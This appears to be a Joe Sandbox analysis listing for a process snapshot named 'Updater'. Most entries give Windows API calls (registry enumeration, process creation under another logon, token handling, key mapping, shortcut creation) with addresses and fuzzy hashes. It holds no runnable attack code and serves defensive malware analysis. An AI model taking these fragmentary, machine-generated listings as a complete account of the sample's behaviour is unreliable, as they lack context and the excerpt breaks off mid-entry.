                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3859894641-0
                                                                                                                                                    • Opcode ID: 0972d775bbf2b951f08b9a2a90991bd75eb0223f99e976f96aa5aa1bb5f99fbf
                                                                                                                                                    • Instruction ID: b1f1cdd586be4e5aef68308feb6ad5d55b6db80fa2879707407cb5391ce042bc
                                                                                                                                                    • Opcode Fuzzy Hash: 0972d775bbf2b951f08b9a2a90991bd75eb0223f99e976f96aa5aa1bb5f99fbf
                                                                                                                                                    • Instruction Fuzzy Hash: 5B51D631620301DBDFA8BF28D4D5639B3E5EF45390B2094DAE44ACF2A6EB749C48CB55
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                      • Part of subcall function 00BAD398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAC0AE,?,?), ref: 00BAD3B5
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BAC6CA
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BAC725
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BAC76A
                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BAC799
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BAC7F3
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00BAC7FF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2678008712-0
                                                                                                                                                    • Opcode ID: e3419abd4272ec87edd85e2e342489446059888473342b95e9929ea91f52903e
                                                                                                                                                    • Instruction ID: 039cc05a12204dadc37d0076d737e7aa94cb25614722fbe57dee3f18b8c3fc70
                                                                                                                                                    • Opcode Fuzzy Hash: e3419abd4272ec87edd85e2e342489446059888473342b95e9929ea91f52903e
                                                                                                                                                    • Instruction Fuzzy Hash: CF819035108241AFC714DF24C895E2ABBF5FF85308F1489ACF55A8B2A2DB35ED45CB92
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(00BF2890,00000000,00BF2890,00000000,00000000,00BF2890,?,00B78EBD,00000000,?,00000000,?,?,00B78E87,00000004,00000000), ref: 00BB8C1B
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00BB8C3F
                                                                                                                                                    • ShowWindow.USER32(00BF2890,00000000), ref: 00BB8C9F
                                                                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 00BB8CB1
                                                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 00BB8CD5
                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BB8CF8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                                    • Opcode ID: f1c6c28a4d013306abe0eed11c06dd6574476667a55d9c7f5f224597c3f4c2fa
                                                                                                                                                    • Instruction ID: 24ecd81aef9f91aed362096ed88bd8a9fe145ff929fbbefca9d7413c7660991b
                                                                                                                                                    • Opcode Fuzzy Hash: f1c6c28a4d013306abe0eed11c06dd6574476667a55d9c7f5f224597c3f4c2fa
                                                                                                                                                    • Instruction Fuzzy Hash: 64416F70601144EFDB26CF14C489BE57FE5FB09314F1841E9E9598F2A2CBB1AC85CB60
                                                                                                                                                    APIs
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B970B5
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B97219
                                                                                                                                                    • CoCreateInstance.OLE32(00BC0CAC,00000000,00000001,00BC0B1C,?), ref: 00B97232
                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B974D6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                    • String ID: .lnk
                                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                                    • Opcode ID: 6966cd99a02074ee43e0ab7e07f67f6897ad36af57be7c9dfb672b7a05a2b2e2
                                                                                                                                                    • Instruction ID: 6e8bbfc55588d9cafac6ba4cbfb4cd70effee0d9bfd75505f0d8c84c09cf68ff
                                                                                                                                                    • Opcode Fuzzy Hash: 6966cd99a02074ee43e0ab7e07f67f6897ad36af57be7c9dfb672b7a05a2b2e2
                                                                                                                                                    • Instruction Fuzzy Hash: 4AD15B71608311AFD700EF14D881E6BBBE8FF85704F0449ADF5899B2A1DB71E946CB92
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B91666
                                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00B9169D
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00B916B9
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00B91733
                                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00B91748
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B91767
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3368777196-0
                                                                                                                                                    • Opcode ID: 689f4a88b9f51b1aacb27aba1e2acc4bf1e7130d24dffd4f5c60b2114b27cb3f
                                                                                                                                                    • Instruction ID: 658d86c59025822ce804e9d0ab2c45d945e39cab5f28f1bb9331e08f159d448d
                                                                                                                                                    • Opcode Fuzzy Hash: 689f4a88b9f51b1aacb27aba1e2acc4bf1e7130d24dffd4f5c60b2114b27cb3f
                                                                                                                                                    • Instruction Fuzzy Hash: 83317271900205EBDF00EF98DC85A6EB7B8FF45710B1485B9FA04AB246EB74DE14DBA4
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B
                                                                                                                                                    • GetWindowLongW.USER32(01382130,000000F0), ref: 00BB8695
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00BB86BA
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BB86D2
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00BB86FF
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00BB870A
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B9C28E,00000000), ref: 00BB871F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2294984445-0
                                                                                                                                                    • Opcode ID: c76ef5516b1cbdccb248c5e52e5d83cc52b248a22ce0b32829f62d2d8557ace0
                                                                                                                                                    • Instruction ID: bb18c4570d5c7f99294c670a773e5d199d076d2ed5e60219815975a705ae7055
                                                                                                                                                    • Opcode Fuzzy Hash: c76ef5516b1cbdccb248c5e52e5d83cc52b248a22ce0b32829f62d2d8557ace0
                                                                                                                                                    • Instruction Fuzzy Hash: B3217431610246AFCB249F39DC44ABA37E9EB45365F204769F926C72E0EEB4D850DB10
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2119F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B21192,?), ref: 00B211BF
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B96441
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B96561
                                                                                                                                                    • CoCreateInstance.OLE32(00BC0CAC,00000000,00000001,00BC0B1C,?), ref: 00B9657A
                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B9659B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                    • String ID: .lnk
                                                                                                                                                    • API String ID: 3172280962-24824748
                                                                                                                                                    • Opcode ID: 007552633a3a4c9693d69784724ffd62190337252ad7d08b75df48316d89ea78
                                                                                                                                                    • Instruction ID: 4f23ae407e7c90deedd95a5c66a794f63015bc4c2e5cd5ea372133042462e3d5
                                                                                                                                                    • Opcode Fuzzy Hash: 007552633a3a4c9693d69784724ffd62190337252ad7d08b75df48316d89ea78
                                                                                                                                                    • Instruction Fuzzy Hash: 65D155746043119FCB14DF24C480A6ABBE5FF88704F1588ADF8998B361DB36ED45CBA2
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B820BE: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B820D4
                                                                                                                                                      • Part of subcall function 00B820BE: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B820E0
                                                                                                                                                      • Part of subcall function 00B820BE: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B820EF
                                                                                                                                                      • Part of subcall function 00B820BE: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B820F6
                                                                                                                                                      • Part of subcall function 00B820BE: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B8210C
                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00B82443), ref: 00B828C6
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B828D2
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00B828D9
                                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B828F2
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00B82443), ref: 00B82906
                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B8290D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                                    • Opcode ID: f2cc8badcf116c94e26c1af04c2d6db6b7ae75399f1bfe6a8bb375e17d09daf7
                                                                                                                                                    • Instruction ID: b3d242845e9a78ce4a9933c37b7e70f2029f4aec9f7e64ef0ceff83b3cbab0a9
                                                                                                                                                    • Opcode Fuzzy Hash: f2cc8badcf116c94e26c1af04c2d6db6b7ae75399f1bfe6a8bb375e17d09daf7
                                                                                                                                                    • Instruction Fuzzy Hash: 7A11D0B1600205FFDF20AF68CC09BAE7BB9FF45315F5041A8E841A7260DB7A9900DB60
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B8260F
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00B82616
                                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B82625
                                                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00B82630
                                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B8265F
                                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B82673
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                                    • Opcode ID: 30427f168f0ac55430d98c5c356149437d7636c9beb7da30acac0a29e77ae3f7
                                                                                                                                                    • Instruction ID: aaef06d65d89bd53347edb9420751ffa43a79a0aaa98a678f44500d674a2d6bb
                                                                                                                                                    • Opcode Fuzzy Hash: 30427f168f0ac55430d98c5c356149437d7636c9beb7da30acac0a29e77ae3f7
                                                                                                                                                    • Instruction Fuzzy Hash: AC11297250120DABDF019FA4ED49FDA7BE9EF48314F044165FE04A21A0E7B68E61EB61
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,?,00B4490E,?,00000002,?,00B454B1,00B4621F), ref: 00B52C4F
                                                                                                                                                    • _free.LIBCMT ref: 00B52C82
                                                                                                                                                    • _free.LIBCMT ref: 00B52CAA
                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B4621F,00000000), ref: 00B52CB7
                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B4621F,00000000), ref: 00B52CC3
                                                                                                                                                    • _abort.LIBCMT ref: 00B52CC9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                    • Opcode ID: 1efd40519e44e9a7e2e530be1d6d021bc25b0f5a8af5d012cfbb7854c3de0e37
                                                                                                                                                    • Instruction ID: 847438f5fc1f7b91e43edcbd62068c05002425a4bd089eb2277ffc7f23e0d4c0
                                                                                                                                                    • Opcode Fuzzy Hash: 1efd40519e44e9a7e2e530be1d6d021bc25b0f5a8af5d012cfbb7854c3de0e37
                                                                                                                                                    • Instruction Fuzzy Hash: 5FF0F43620664167C31173286D4AF1E21D5DFC3B73F3441D4FD14A3293FE668C0A5121
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00B861F7
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B86208
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B8620F
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00B86217
                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B8622E
                                                                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B86240
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                    • Opcode ID: 3960e0782052c90f5802dc6aab84f5355a0bcf91d8c45b39e3744ea5c8aec051
                                                                                                                                                    • Instruction ID: 6d58dae49d97a4f376aae2b71841b0262aaab3b9d280a02c4e1f2eeaf1725cab
                                                                                                                                                    • Opcode Fuzzy Hash: 3960e0782052c90f5802dc6aab84f5355a0bcf91d8c45b39e3744ea5c8aec051
                                                                                                                                                    • Instruction Fuzzy Hash: A301AC75E00308BBEF10ABA59C49A5EBFB8EB48351F004166FE08E7251EA70DD10CF50
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B33B38: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B33B92
                                                                                                                                                      • Part of subcall function 00B33B38: SelectObject.GDI32(?,00000000), ref: 00B33BA1
                                                                                                                                                      • Part of subcall function 00B33B38: BeginPath.GDI32(?), ref: 00B33BB8
                                                                                                                                                      • Part of subcall function 00B33B38: SelectObject.GDI32(?,00000000), ref: 00B33BE1
                                                                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00BB9439
                                                                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00BB944D
                                                                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00BB945B
                                                                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00BB946B
                                                                                                                                                    • EndPath.GDI32(?), ref: 00BB947B
                                                                                                                                                    • StrokePath.GDI32(?), ref: 00BB948B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                                    • Opcode ID: 26725c674d72b3382db3ff8d81c8418c930942c6445fedc6ac6c724cd7334454
                                                                                                                                                    • Instruction ID: e2606b0a9c264901c0900c1d88b48dc1b78e2a64914fd1c608fb16e22ad630c1
                                                                                                                                                    • Opcode Fuzzy Hash: 26725c674d72b3382db3ff8d81c8418c930942c6445fedc6ac6c724cd7334454
                                                                                                                                                    • Instruction Fuzzy Hash: 38110976000109BFDF129F90DC88EEA7FADEB08360F44C166FA195A160DBB19D56DBA0
                                                                                                                                                    APIs
                                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B3FA2C
                                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B3FA34
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B3FA3F
                                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B3FA4A
                                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B3FA52
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FA5A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                    • Opcode ID: a69896981076061de4ffbad539d94702144f751d727e68e97a31c127cc301669
                                                                                                                                                    • Instruction ID: 0c37c78daaf75c2c49060b6f39d865a41639eb89f0b6d1bb1da4a38bcaa2e905
                                                                                                                                                    • Opcode Fuzzy Hash: a69896981076061de4ffbad539d94702144f751d727e68e97a31c127cc301669
